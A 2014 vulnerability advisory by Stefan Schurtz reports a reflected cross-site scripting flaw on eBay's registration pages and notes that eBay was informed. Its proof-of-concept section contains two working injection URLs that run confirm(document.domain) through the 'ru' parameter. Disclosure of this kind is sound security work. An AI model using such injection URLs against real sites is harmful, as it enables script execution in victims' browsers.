SSCHADV2014-004 - reg.ebay.com - Cross-site Scripting vulnerability
Advisory:
|
reg.ebay.com – Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2014-004
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on reg.ebay.com
|
Vendor URL:
|
|
Vendor Status:
|
informed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The website reg.ebay.com is prone to a cross-site Scripting vulnerability
======================
PoC-Exploit
======================
PoC-Exploit
======================
https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo=&siteid=0&UsingSSL=1&co_partnerId=2&MfcISAPICommand=RegisterEnterInfo&co_partnerId=2&siteid=0&ru=http%253A%252F%252Fwww.ebay.com%252Fusr%252Fpatrice.php%253Ffol%
253D7df875b8eb5a9c9a78d92c72acc2fb8dd6e6dfa4eee1a922ab5464ffcd09d322%2526widget
%253Dfollow_113459%22%3bconfirm%28document.domain%29%2f%2f4189ebe3a&bin=3984&pageType=3984®ister_signin=Register
|
https://reg.ebay.com/reg/PartialReg?siteid=0&ru=http%3A%2F%2Fwww.ebay.com%2Fusr%2Fpatrice.php%3Ffol%3D7df875b8eb5a9c9a78d92c72
acc2fb8dd6e6dfa4eee1a922ab5464ffcd09d322%26widget%3Dfollow_113459%22%3Bconfirm%28document.domain%29%2F%2F4189ebe3a&MfcISAPICommand=
|
======================
Solution
======================
-
======================
Disclosure Timeline
======================
30-Jan-2014 – ebay informed via "http://pages.ebay.com/securitycenter/Researchers.html"
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ebay.com/
http://www.darksecurity.de/advisories/2014/SSCHADV2014-004.txt
Comments
Display comments as Linear | Threaded